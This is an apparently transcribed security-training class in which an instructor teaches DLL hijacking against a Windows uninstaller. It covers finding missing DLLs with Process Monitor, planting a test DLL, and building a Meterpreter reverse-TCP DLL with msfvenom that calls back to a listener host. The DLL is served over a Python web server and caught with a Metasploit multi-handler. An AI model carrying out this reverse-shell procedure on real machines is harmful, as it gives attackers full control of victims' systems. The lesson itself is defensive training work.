previous session. Yep. So what actually we learned in our previous session was regarding the DLL hijacking. So what actually is DLL hijacking? What are the DLLs and how we will be able to go forward and what exactly will be the priority for the same. Let us understand or have a quick revision on the same. The first thing is what actually are DLLs. DLLs are those specific files which can be reused by the application or operating system. By using the DLLs, what actually will be happening will be the advantages majorly application will get is it will be using the very less resources compared to the normal application. It will be having very much modular architecture where it can just add one of the other DLL and add one more functionality. The ease of ease of installation and deployment will be very much easy, right? So that those specific things will be very much easy for the development team. So because of all of these particular advantages, normally DLLs are being used by the applications. Typically, these are the separate file or separate code file, okay, which can be reused again and again by the application. So what actually will be happening is whenever there is any specific type of application, for example, if we are having something like if we are having one of the application, right, and it has one of the for example, change password functionality. Now what it will do is instead of keeping that particular functionality in the code base, what it will do is it will prepare a specific DLL for that. So it will have change password.dll. Now, whenever this functionality is called, basically it will call this DLL file, it will search for the DLL file, it will call this particular DLL file, and it will execute the same thing. What will be the advantage of preparing a separate DLL file instead of keeping that code in the code base? Typically, what will happen is if this code is getting increased, definitely the size of the application will increase, and whenever it is loading within the memory, it will increase the RAM consumption and our hard disk consumption, right? But if it is in the separate place, so basically whenever it requires, for example, it requires in multiple instances, definitely it can directly go to that particular file and call that code. So if that particular functionality is called, then only our RAM will be occupied, otherwise it will not be occupied. Whenever the installation is done, typically this kind of files are bundled up, and basically the bundled files are shared. So at that point of time, again, the installation downloading will be very much easier. And whenever we will be having those specific type of files, right, even though there is any kind of error which is coming up within the application, and if the error is coming from this particular type of DLL files, definitely just replacing the DLL file will resolve that particular issue. We do not need to uninstall and reinstall full application and that might affect our data, right? So because of this particular main advantages, DLLs are being used by the applications. There are majorly two particular type of DLLs. First one will be system level DLLs and application level DLLs. System level DLLs will be utilized by the application to get the permissions. Okay, many times if you are installing the Zoom for the first time, you might see that whenever you are executing or whenever you are enabling your camera or microphone, your operating system asks you that whether you need to give this permission to this application or not. So basically what actually is happening in the backend, basically whenever there is those kind of application which requires permissions, for example, here it requires camera permission, right, camera access to complete its own functionality, what it will do, it will go forward and call that particular operating system level DLL which will be available, right? And basically whenever it tries to access the DLL, our operating system, if operating system gives the permission, it will be able to access the DLL code, otherwise it will not be able to access the DLL code. So in between, what it will do is basically our operating system will ask that whether we want to provide that particular information or not. If yes, then basically it will go forward and it will allow that code to be utilized by the application, otherwise it will not be allowing it likewise. So basically that is the thing which will be available on the first page. Second one will be application level DLL. Application level DLL, which we had discussed like this one, right? So application will be having its own bundle, right? Whenever we are downloading the bundle, typically how we are installing, right? We will be having a kind of MSI files. MSI files will be a installer files. What it will do is basically it will download the bundle of installation. So that bundle will contain multiple DLL files, configuration files, right? Configuration files, all the exe files, the temporary like the folders and files, all of those kind of things will be there. So basically that particular DLLs will be utilized by a exe, and basically the application will be able to complete its own functionality. Now this DLL will be application specific DLL. This DLL cannot be utilized by other applications, and it will be having the code of the same application itself. Whenever it requires that code to execute, it will reach out to the DLL and it will go forward and execute the code. Here it will not be requiring any kind of operating system permissions to go forward and complete or access that particular code, whereas in the operating system level DLL, it was requiring the operating system intervention to get the permissions of it. Here, as it is created by the application itself, it does not require those specific type of things. So now that we had understood what actually are DLLs and the types of DLLs, let us understand what actually is the priority which application will be doing for searching the DLLs. Here directly it will not know, right? All the paths will not be by default configured. It needs to be searching within our system to go forward, because it might try to access any of the other DLLs, right? And the path might not be my path might be varying from operating system to operating system, or even the user to user. So at that point of time, definitely that particular path is not at all a constant path, so it cannot be hard coded. I cannot tell that kernel 32 .dll, right? If this particular DLL is available, definitely in which particular, definitely at that point of time it will be in system 32, right? But if it is looking for any of the other DLLs or any specific DLLs, right, it cannot identify that in this system where exactly that particular DLL will be available, right? Because of that particular reason, what application will be doing is to access that particular DLL, it will be going forward and it will be searching that particular DLL file within the operating system, right? Within multiple paths. And it will be going forward with one of the search order. Now, if that particular search order, if it is finding the DLL, it will directly execute it. Otherwise, it will not execute it. It will go forward with our second path, and then third path and fourth path. There are 4 places where it will be checking up. What are those specific 4 places? The first place will be within the system directory. System directory is C, Windows, and system 32. Right? In this particular place, majorly operating system DLLs are available. Let us go forward and see that. So if we go to this PC, if we go to C, if we go to Windows, and if we go to system 32, right? And within the system 32, if you scroll down, you will find loads of DLLs files which are available, right? 𝗔𝗃𝗶𝗶hi and all of those kind of things. Now, typically, these are the operating system DLL files. Now, whenever it requires some specific type of functionality, right? Typically, it will try to access it from here and it will get the access. So the first place where it will be searching for the DLL files will be this one. Now, in case if it is getting that particular file into the first place, it will never go to second, third, and fourth paths itself. But if it is not getting that DLL file in the first path, then it will go to the second, then third, and then fourth. So in the second path, what actually it will be, basically this will be the 16-bit system directory. Previously, we have seen the system 32, right, which is 32-bit system directory. Now it will be going to the 16-bit system 16-bit directory, which is nothing but the system. So on top of the system 32, there is one particular folder which is system. So in the second place, it will be checking here. whether it is finding any particular type of DLL which is available here or not. Now, why actually I am explaining all these particular paths to you guys? This holds very much importance, right? Whenever we are going forward and whenever we are trying to hijack the DLLs, right? So basically, that is the main reason why we are understanding this particular things. Then the next thing will be our next particular path will be Windows directory and then current directory. So basically it will be C and Windows and then the place or the directory where the specific tool has been available. So these are the four main paths which are available. So let us go forward and see the third place where it will be seeing. So basically in the C Windows, it will be checking here. So here you can see there might be some of the DLL files. Here you can see there is one of the DLL file. Likewise, it might be having more DLL files as well based on the system. If I am installing or downloading something else, definitely I might have more DLL files or less DLL files compared to the user, whatever I am utilizing at that point of time. And last place will be where exactly tool is getting executed, right? From that particular place, the DLL file will be available. So these are majorly the four paths which will be available, and it will not be going through any kind of random order, right? It will be going through the same order, and whatever is the place where it is finding that particular DLL file, right, in the first place, it will directly jump to that particular path and basically it will execute the code. It will not be going ahead and check those things. Let's understand this with a few of the cases, right? For example, there is case 1 where the application is looking for kernel32.dll, right? So basically, if we go ahead and see that particular DLL, which is here. Now, if I just jump here, I can show it to you. So typically, that particular DLL file is available here, and it is system32, right? So basically, application wants this particular DLL file to complete its own functionality. So where exactly it will be checking? Always, the first place will be in the system directory, right? Which we had understood till now, right? Which is system32 in that particular place. Now, in this scenario, basically it has found in the first place itself, in which is system32 directory. So definitely it will go ahead and it will execute the same thing. It will not be going to the system, Windows, and the current path. It will directly go ahead and it will check. It will execute the same thing. Now, the second case is basically this particular application requires one of the DLL file, which is this one, 𝗀_32.dll, right? So what actually it will be doing? Again, it will be following the same process. It will first of all check system32 directory. Now here, as the DLL file is not available there, right? So basically at that point of time, what it will do is it will check that, okay, here that name is not found. It will go to the next place. Next place, what it will be checking? It will be going to system directory, right? And basically at that point of time, it will check whether it is there or not. So currently it is not available there also, right? So at that point of time, where exactly it will check? It will check for the Windows directory, right? And here that particular DLL file is available, so it will directly execute it. It will not go to the fourth place, right, which is current directory. Likewise, so basically, likewise, it will be checking in that order, and wherever it is finding the first directory, it will directly go ahead and execute the same thing. Now let us see one of the other thing. Now we are having one of the client application, and it has its own particular DLL files, which typically is stored in the same bundle where the application is executed. So at that point of time, what actually happens here? So basically here it is having something like login.dll, and we are trying to execute the login functionality. So first of all, it will go to system32 directory. Then it will go to system directory. Then it will go to Windows directory. Now all the places it was not able to find. So at last it will be going to the place where the application was executed, right? in the current directory. So at that point of time, it has found that, okay, this login.dll is available. It will directly execute it. Okay. And basically, we will be able to see the functionalities as well. Likewise. Now, the last test case is, so there is something like login2.dll, which has been available within the application. Typically, it will again go forward with the same directories which are available. But in this scenario, what actually happens is this DLL file is not at all available in any of this particular folder. So at that point of time, what actually it will be doing? It will be throwing us an error that this functionality cannot be executed due to missing files, right? So basically what we need to do is basically we might be requiring some kind of troubleshooting or anything like that, but basically it will just throw us an error that this file is not found and the functionality cannot be executed at that point of time. Likewise, so this is how the DLLs will be. This is how the searching within the DLLs will be. Now, where exactly we can go ahead and exploit this particular type of functionalities which is given by the developers to the application. Now, typically, we understood that basically these are the things which are available, right? We will be targeting this kind of cases where the application is looking for the DLL and the application or the system does not have that particular type of DLL file. Okay, something like login2.dll. So it has not found any particular things, right? It has not found this particular type of DLL file within all those specific 4 places. So at that point of time, we will be looking for those specific DLL files which are not at all available within the application or within our operating system, but application is looking for that one. Typically, whenever you are seeing any normal software, it will be trying to check many of the DLL files, and many of the DLL files might not be available as well, right? This is a very common scenario. And basically, at that point of time, what we'll be doing is we know that the other application is searching for those specific things. We will understand where exactly it is looking for, what actually is the current directory, where the current directory is stating, right, is situated, and what is the path of it. Okay, once we are identifying the path and once we are identifying the name which that particular application is looking for, we will go forward and we will create our malicious DLL file, and that particular DLL file with the same name we will be putting into the same path. And then we will execute the application and we will see whether it is executing that particular malicious DLL or not. Okay, so this is the main reason why we had understood this particular thing, right? So what actually will be the impact of it? We can take over the full system, operating system itself, if we are coding this malicious DLL, right, with loads of those specific malicious code for taking the reverse challenge and all of those kind of things, right? So basically, whatever there are loads and loads of possibilities, and this is very much critical vulnerability. Even though if you are going for the interviews or if you are talking with the clients, definitely they might ask you many questions regarding DLL hijacking, right? The main questions will be surrounding like what actually is DLL hijacking and what is the hierarchy which or the search order which application will be doing, right? So these are the main 2 questions which are very much important if you are going through the interviews. So now let us go forward and understand how actually this particular thing will be working, how we can exploit the same thing. For that, we will be using few of the tools. Okay, one of the tool is already being used by you guys, which is process monitor, right, which we have already seen. We will be utilizing it to identify where exactly the application is searching for the DLL. Okay, and basically we'll be going forward. So how actually we'll be able to exploit it? First, we need to search the order of DLLs, right, where actually the DLLs are looked for. We'll be specifically looking for those specific DLLs which are not at all available, and we will put our DLL file into the place where application is looking for. So basically, the links and everything will be already available in the PPT as always. You can just go ahead and download it from there. What we will be doing is, first of all, our first process will be, we will be executing the procmon or proc monitor. Now this, if you have completed your previous assignments, this will be pre-installed in your system, because we had learned how to use procmon and how to go forward and validate like how to execute the same thing. Let me just open it within my system. Yep, so proc1 is there. We will just execute it. We will if you are re-executing it, definitely your the filters which you might have created might already been available. What we will be doing is we will just reset those filters, because we want all the data which is available within our system. Currently we want all the data. We will click on apply, we will click on OK. Okay, and basically it will start those specific start the monitoring of whatever are the things which are being done by the processes, right? It is going forward and it is having that. Now, what we will be doing here is we will be going forward and we will be filtering out the process name, okay? Because we want to get that particular process which is available, right? Where we want to go forward and identify that, okay, this is the process and these are the steps which are done by the process. So first of all, we will be filtering out with the process name. So normally the process name will be the same. So basically this is the application which we are targeting, right? So basically we will be taking up that name. Now this is 𝗂𝗶𝗶 remover, which is 𝗧𝗿𝗶𝗶 antivirus remover tool, right? So basically the name will be a same one. We will just go forward and take the name of it. We will copy it. And this tool is being used to remove the antivirus software. Okay, it is type of an uninstaller tool. We will go to filter, and here within the filter, here we will select architecture to go forward with the process name. Process name is, we will just paste it up. Make sure you don't change any kind of capital letters to small letters or anything. The name should be same itself, exact same. We will put a .exe, the extension. We will go ahead and we will add that particular filter. We will click on apply and we will click on OK. So currently you can see our this particular thing is totally blank, right? Because anyhow, we haven't executed this particular tool till now. So that is the main reason why this is blank. Next thing will be, we will be searching for that particular things, because anyhow we want those specific DLLs and the path of the DLLs which are not found by the application, right? So that is why, that is the main reason why we will be searching for the path where DLL is where the application is looking for the DLL, and the result should be name not found, right? Where it is not able to find. So again, we will go back to the filter. We will go back to the filter, and here you can see the first filter is already in place. We'll go to the second option, which is path contains DLL, and then include, right? So basically it is looking for the DLL. Wherever the path is having DLL in it, we will go forward and we need that particular result. And the last thing is, we don't want all the success results, right? If it is finding kernel 32, it is good for the application. We don't want that particular thing. So what we are going to do is, we will just go to the filter again, and we are looking for the specific things where the name or the application is not able to find the DLL. So we'll go to result, and if we will enter contains name not found. So basically here, result contains name not found.
ये कौन सा एप्लीकेशन है?
Process monitor. Okay, so basically same order we will be going forward and we will be adding up. Once we are done with that, we will click on add, we'll click on apply, and we will click on OK. So basically at that point of time, it will be filtering out that particular processes which are done by that particular application. Now, once it is done with that, once we are adding those specific filter, right, we will go ahead and we will execute the application. Okay, and basically we will constantly monitor that what actually are the things which are available, right? What actually are the processes which are having the same criteria which we are looking for. So basically we will wait for a few seconds for this uninstaller to get started and we will see that what actually are the results which we are getting at that point of time. So here there was something. We will just give the privileges, all those things to the tool for it to install all the stuff for uninstalling. And here you can see those specific things are coming up. We will complete all the functionalities, right? For example, if the tool is having some specific type of things, definitely we will go forward and we will complete all the functionalities. So for example, here it is asking us for the accepting the license and all of those kind of things, right? We will do that particular things. Here it is trying to detect, we will allow it to do this, all the things, right? We want this particular um all this particular detail to be completed, right? So any of the functionalities, so we can just go forward and we can check. Okay, and we will just try to populate all these things. We can enter some kind of random stuff, and we can go forward and say, right? So you can, whenever you are having your thick client application, just add all or complete, like go through all the functionalities so that this particular things get populated, and then we can review it. Now in this tool, this was the main functionality which was available, where it was looking for the 𝗧𝗶𝗶 products, and basically it was trying to remove them, right? Uninstaller type of thing. Basically, now what we will be having is, so here you can see this is a kind of a captcha it is giving. I will just fill up that particular captcha and all of those kind of things, right? Although it is not required, but we can go forward and we can try to complete those kind of functionalities. Here you can see many of the things are trying to get available, right? So likewise, we will try to populate in case if your application has login functionality, logout functionality, the specific change passwords, any kind of functionality, right? Adding some kind of details, removing some kind of details, just complete all the functionalities, because we are not knowing which kind of DLL application is having as a part of application based DLL, right? So those kind of things. Here currently it is still in the progress. So once it is done, here you can see there are multiple things which it is trying to call, right? So once it is done, then we can exit the program and we can review what actually are the things which application is looking at. So still it is in progress. And here you can see in the meantime it is in progress. Here also the details are getting populated. So here you can see it is removing. So meanwhile it is removing, let us review the result and let us see what actually it is showing the details to us. I will just quickly magnify so that you guys can see the things clearly. So what actually will be happening here is, here in the path and the result are the places where we are looking for, right? So basically here you can see all the result will be having name not found itself, because basically these are, we have already filtered out, right? That whatever DLLs it is looking for and the DLL it is not getting, right? Those specific type of DLLs we are looking for. Now, typically, it will give us all those specific type of DLL files which are available, right? Something like here, the first DLL which it has not found was this one, which is 𝗧64.log, 𝗧64log.dll, right? This was first of that particular log. Then it was having this one, which it is looking for within the desktop, which is user env.dll, right? Then it is looking within the desktop. So basically system32, okay, in case if it has found in the system folder, then it will not be showing us that particular thing in the next place. Then if it is found in the Windows folder, then it will not be showing. So basically whatever places it has not found that particular DLL file, we will be having. Now what actually we'll be doing, so basically the current directory, right? Now I had executed this particular program within my desktop folder, right? So whatever are the DLLs which are available within the desktop folder, right, that particular DLLs are not available within the system, and the application was not able to find it, and that is what we are looking for. Something like here, I had executed, now I have executed that particular application within the desktop, so I'm looking for the desktop path, right? In case if you are executing within the downloads folder or any other folder, you need to look into that particular path, right? The path within our systems might not be the same, right? It might be changing. You need to modify it as your current requirements. So here you can see again, it is checking for the desktop path, and there is one DLL. There are multiple DLLs which it is trying to check, right? And basically what actually is the result which is coming up, it is not getting those specific DLLs. Now you can ignore this kind of things, which is dll.config, okay, or safe DLL search mode. So this kind of things we can ignore. We can just have that particular extension which is ending with a DLL. So this also you can ignore, right? So those specific type of things you can ignore. We can just go forward and check for those specific things which will be having that particular DLL path. So in that scenario, what actually we will be doing now that we have found that, okay, basically it is having it is looking for that particular DLL file. For example, it is looking for 𝗶𝗶 remover enu.dll within our system, right? So we have understood that, okay, this is the path. Now currently this application, what actually it is looking, where exactly it is looking for that particular path, it is under C users, then the system name. Here in my scenario, it is 𝗶𝗶, then desktop, and the file which it is looking for is 𝗶𝗶 remover enu.dll. Now make sure that the name will be exact same name. Okay, there should not be any type of spelling mistakes. Okay, or even there should not be any kind of change in capital letters and small letters. Otherwise, your payload or your exploit will not be working. So 𝗶𝗶 remover enu and enu in capitals.dll. So basically, this is the file name and this is the path where it is looking for. Now that we have understood that this is what it is looking for, what we will do is we will prepare, or we will have a malicious DLL, okay, and we will rename it to this particular DLL file, and we will keep it into the same particular folder which is available. So now that our work is done, what we are going to do is we will just close this process monitor, right? We will close this particular tool as well as of now. So here you can see remove operation finished. You need to reboot your system, not an issue. Basically now what we'll be doing is we'll be downloading the exploit. First of all, let us understand what actually is exploit which is doing, okay, and then we will understand that particular how actually it will be what we should be getting the result as well. So this exploit is very much simple. The code is starting from here. This is simple C level code. Now DLLs are typically within the C level code itself. What actually it is doing, it is trying to go forward and take that particular DLL process, okay, and if it is able to take, what it is doing is DLL hijacked. It is just showing us the information to us, right, and nothing else. So basically it is going forward and it is taking the DLL, okay, that particular process, and it is attaching to that particular application. If application is successful, then that particular DLL file will be giving us that DLL hijack, right? So this kind of message. So if we are getting that message, means the application is vulnerable to DLL hijacking. If not, typically your application is not vulnerable to DLL hijacking. So now this things might be difficult for you to change. So right, so converting C code to DLL and all of those kind of things. So basically what I have done is just to give you a good amount of I think what I have done is I have just taken up this particular code itself, converted into the DLL file, and just I have given the DLL file to you guys for your practice. Now the same file you can utilize in your projects itself. The main thing which you need to do is just change the name of that particular file and put it into the path which you are having, which you have found from your process monitor. What we will do is we will just go forward and download that particular file, and it might say that the file is infected, right? So basically you can just accept it and you can go forward and validate. And what I will do is I will just put it into the folder which is available. So basically, this is the file. Now what we are going to do, we will just validate whether the file name is correct. So basically here you can see 𝗶𝗶 remover enu.dll. enu is in capital, so it is the same thing. And whether the path is correct or not. So basically here it is in the desktop path itself. So typically we are having in the same particular folder. Now what we are going to do, now we will execute our application and we will see whether the infected file which we had prepared, right, whether that particular file is getting executed or not. And you can see that instead of giving us the application functionality, what we have gotten is DLL hijacked message, right? So basically that application is executing this DLL file instead of the DLL file which it is supposed to execute, right? So basically that is what we can call it as in DLL hijacking. Now, typically, what actually are the things which can be done instead of this, right? This is a real life threat itself. Many times you might download many things from torrent, right? Many movies and all of those kind of things. What they come up with whenever you are downloading those specific movies from torrent, right? With that particular movie, right? For example, MP4. There will be one particular DLL file which will be available. In the previous ones or older version of VLC media player, right? They were like they were having this particular vulnerability which was DLL hijacking. So at that point of time, attackers has compromised loads of machines because of this particular vulnerability, right? By sending them the malicious DLLs and taking that particular details. So now that we had understood how we can take over the machine with the use of DLL hijacking, right? So I will show you the method to it. Then rest of the things will be upon you, how you can execute. So I will show you the method to that. For this, we will require Kali Linux. Now, typically you guys are already in the security field from years, right? So you might have Kali Linux. So I am not showing the installation part and all of those kind of things. I believe you guys can figure that out, or you might already been using the Kali Linux from multiple times as well. What I will show you is, I will show you how to create a really malicious DLL file, which can go forward and take the reverse shell for you, right? So those specific things we will see now. We'll wait for a few seconds for this to get loaded.
Okay, well, I have one question.
Yeah.
Like we have seen a lot of DLS. So why do we select? Means maybe while we are doing a penetration testing for text.
Any DLL you can select. We have selected one of that. You can select
Okay.
other ones as well. Not an
Okay.
issue.
It's not like, I just want to understand, what should be the selection criteria. So any
No,
DLL
no.
we can select and check,
Yeah,
by
yeah,
replacing the code,
yeah.
whether our code get executed or not.
Correct. Just you
Okay.
need to select in the current directory. Like in the first one, we had select within the system directory, which was not found, right? So basically, you do not need to select that particular thing. In the current directory, whatever are the things which are not found, right? So that particular things only you need to select.
Okay, got it.
So system 32 system or Windows directory, if anything is not found, you do not need to select. On the current directory only, you can select that. So let me just increase the font size for you guys. Okay, and basically what we are going to use currently is the MSF Venom, right, which is one of the Metasploit framework. It is used to create this kind of payloads for us. What we are going to do is we will enter MSF Venom. We will enter -p. -p is for payload. We will enter Windows / Meterpreter / reverse TCP. Now, in case if you have used MSF Venom or any particular Metasploit framework as well, you might be aware that these are the arguments which we need to specify for the application or the tool to go forward and create a payload for us. So basically MSF venom-p for payload, and the payload is available here. We can give the architecture. So architecture is 86 bits. Okay. Currently we have downloaded the Windows which is 64-bit. So you can give 64-bit or 86-bit. Anything will be fine, because 64-bit architecture is having the functionality where it can execute the 86-bit applications as well. We will enter -f. -f is for file format. File format will be DLL. Okay. And then we will be giving the local host and local port details. So let me just quickly take up. So here my IP address is 172.16.17.8. We can use any of the port number. So we will enter AL port, which is local port. You can use any of the port number. For here, I can use 4444. Okay, and that base all the things we will output, okay, in the specific DLL file. So -o for output, and basically we will be giving the same name. So the name was KAV remover enu.dll. KAV remover enu.dll. Any DLL name, okay, whatever is not fine, you can just put that name, and that will be the assignment for you guys as well. Here I have selected one particular DLL, right? You need to exploit with other DLL, right, which was not found by the application. Once we are done with that, we will execute that particular command, and it will give us that particular DLL file. And basically here you will be able to see that the output is available, and it is saved here. So here you can see basically this is the DLL file which is available, right? Now this particular DLL file, we are required to share it with our that particular machine, and we will execute, and we will see that what actually are the things which are available. Now we need to share it, right? So we can just execute a simple Python server, okay, and basically we can use that. So we can enter Python -m simple HTTP server. It will execute those specific things. So here you can see serving that, and this particular IP address, we can open it within the machines which are connected within the same. So if I see here, network adapter is net. If I see here, the network adapter is net. So basically both of them are in the same network adapter. We can easily go forward and get the connectivity. What we will do is we will open that particular IP address. So IP address is 172.16.17.8, 172.16.17.8, and the port number where it was hosted, it was 8000. So we'll enter that. Now it might take some time based on the connectivity between the internal machines. Here you can see the request has been coming up. So this might get loaded, and my Microsoft Edge was restarting, so it might take some time.
One question, like,
Yeah.
how do I know like what that exploit is about to do? Because we are generating a payload, but what will be the
This
currently?
is reverse shell. So here you can see reverse TCP.
Okay,
it
yeah,
is
reverse
reverse
shell.
shell,
Yes,
right?
yes. And
Likewise, in case if you want any other payload, you can select any other payload as well. Not an issue.
okay, got it. And then okay, if we get a reverse shell, then in that, on that machine, means on this Kali Linux only, we will come to know, right?
Yeah, correct. So in your Kali
Yeah.
Linux, you will be having the full access of that machine with DLL hijacking.
Great. Okay, and what will be the remediation or mitigation for such kind of vulnerability?
So basically, they need to go forward and have the specific path itself. So whenever we are having those specific details, right? So at that point of time, they need to select that particular path in that particular order where the specific the application is not taking up any of the DLL files regardless of the specific it is looking for. So basically they whenever they are having those specific here, the main root cause was it was taking up the DLL file where it was not identifying the authenticity of it, right? So at that point of time, it will be validating the authenticity, and then it will be checking what actually are the details which are available at that point of time. Likewise, then only it will be executing.
Okay, then
Likewise.
how to identify the authenticity of the DLL?
So normally, whenever there is any specific type of program-based DLL, right? So it will be having, coming up with the specific, what we say, the signatures of the developers itself, right? Right. If this is coming from the 𝗘𝗶𝗶, so the DLL should be available from the specific owner itself, right? Rather than
Got it.
me being
Yeah, yeah.
developing, right? So the
Okay.
same thing will be available. Likewise.
Okay.
So there is some network issue. Actually, the request came up here, and here you can see it has given but my browser is crashing it. So yeah, basically what we will do is we will just try it once more. Or else, like this was one of the way which I had shown you guys, but else what I can do is I can just drag and drop for this particular
Yes.
purpose. Where it went, closing the home folder. And this is the one. But yeah, this is the way which you can utilize, right? You can just go forward and you can use your server, and basically you can use it. So again, here also it has been came up. So I can just download it from here. I can just click on it. It will get downloaded. So here also you can see it has been downloaded, and we'll be able to get the details also. Based on the network, we might find some details, right? Which is not which might take some time, right? And sometimes it might not take some time. So basically here, from here also it has been loaded, so you can download both of the ways. You can go ahead and you can do. Now, since my browser is giving me some of the issues, so what I will do is I will just drag and drop it. But yeah, as per our convenience, we can use any of the path for this particular practical.
In this case, because as we see there is some connectivity issues even though they are on a same network. So in that case, can we while testing this, can we okay, but it will not be a remote code execution, because what I was thinking, while generating a payload, I will give the Windows machine IP address, because as we see there is a connectivity issue, but it will
Yeah,
not be a
if the Windows machine is vulnerable to some or another vulnerability, then you can do that, right? Otherwise, we cannot do that.
okay. Because
So
I just want to, using a same payload like a reverse shell, we have created like L port and R port.
correct.
Okay, so the functionality or whatever the code required to have the reverse shell, it is generated with L port and R port, which I have configured for the Windows machine, and I want
Correct.
to run the payload in a Windows machine only.
Correct.
So will that work? Like I'm getting a shell there only.
Uh,
Ideally,
so instead of L host, you want to put R host, right? Remote host, right? And so, but the connectivity still is not there, right? So
there
basically, there is
no
no
no no. I just
connection.
want to give the Windows. I mean, I just
IP
want to
address.
yeah. So
It will
that
not be
connectivity,
possible, right? Because
yeah.
still you have not gotten any kind of connection to the connectivity is yet to be made, right? So basically that will not be possible. So
Okay.
now that we had executed, like we had sent this particular payload there, before executing it, before checking it, we need to start the listener, right? Because Kali Linux should be always listening whether it has gotten that, because this is reverse shell, right? Basically, the request will be originated from the victim system to the target system. So we need to start listening here. So we will go forward and start Metasploit framework here. So MSF console. We will execute that. We will take up our listening payload, which is multi-handler. So we will enter use exploit multi-handler. Okay, we will set up all those things which we had configured in the payload as well, so that it can start listening. We will set up payload which we had configured previously, which was Windows Meterpreter and reverse TCP. We will set up our local host where we want to listen. So local host will be 172.16.17. Just check it again. 172.16.17.8. We will set up our local port, which is which we had kept, it was 4444, and we will go ahead and we will exploit. So basically it will start listening, and now we will see whether it is available or not. So basically we will open that application and we will see whether it is loading that DLL file or not. So right, so basically here you can see accept and everything is going on in normal basis, and basically we will check where within some time we will be getting that particular thing as well. Right, so likewise we'll be able to go forward. So now this might take a few minutes to go forward and get that particular connectivity, but at that point of time we'll be able to go forward and see that particular execution as well, likewise. So this is how we will be able to do. Now what will be the assignment for today, right? Basically the main assignment will be you need to, like, all the things will be already available in the PPT, right? So what you need to do is you need to go forward and execute the same application, but here we had taken up this DLL file, right? Instead of this DLL file, you can take any of the other DLL file which is available by the application. Okay, and it has been taken up by the application, and it has been it is some separate DLL file within the current directory where it was not able to find, right? So basically that particular DLL file you need to check, and you need to validate what actually are the things which are available there, and how whether you are able to exploit it as well or not. You need to do for both of the things. You can check locally by the DLL hijack message, right? That particular DLL file, and you can also do, in case if you want, right? This Kali Linux thing is just for your understanding that how this can escalate to a very critical remote control by the attackers, right? So this was just for the explanation. But yeah, in case if you want to do that particular practical as well, you are good to go. You know all the steps. You can go ahead and you can do that particular things as well. Okay, any doubts, any queries till now, guys?
So, Keval, so DLL hijacking is a topmost, I
Yeah,
think,
very critical
vulnerability. Yeah,
vulnerability
critical
yeah,
vulnerability.
very critical vulnerability in thick client penetration testing.
Okay. Apart from that, because we have the Kali Linux to generate a payload, but is there any other kind of payload which, like, it is a reverse shell kind of thing? But is there any other side, the way we have for the payload one to generate for the web application like XSS one? For this kind of thing, do we have any site which we can refer? Because there are less material for the desktop based testing.
Correct. Like for this one, even thick client application projects are very less, right? So there is less material here. So typically for creating this kind of payloads, we are having this MSF Venom and Metasploit framework tool. Other things like XSS and SQL injection, LFI, these tools are not going to help us, because they are specifically to develop this exploits, right? And in this vulnerability, and there is another vulnerability which is DLL injection. In both of these vulnerabilities only, we will be having the utilization of Metasploit framework. Otherwise, we will not be having any of the other usage within Kali Linux.
Okay.
Okay. Yeah. So that was it from my end. So let us join in our next session, and then we'll understand the next vulnerabilities.
Could you please share the
PPT?
PPT? Yeah.
Yeah, let me share it up. Yep, it is shared over the chat window. Let me know once you download it.
Did we have a session yesterday?
Yes, it
Could
was
you please?
having the
Yeah,
no,
yeah.
it was the same in the same PPT we are having. Like it was basics, so just like how these DLLs are working and those kind of things we had understood, theoretical topic.
Okay, so those things are covered because the
In the
this
same
naming
PPT,
convention in the same PPT you have the
same
content. Got
PPT.
it,
Yeah,
got it. Okay, yeah. Thank you. Have a nice day ahead. Saturday, Sunday we don't have any class.
no, Saturday, Sunday. Yeah.
Okay, great. Yeah. Thank you. Have a nice day ahead. Yeah.
Have a nice
Happy
day.
weekend.
Happy weekend.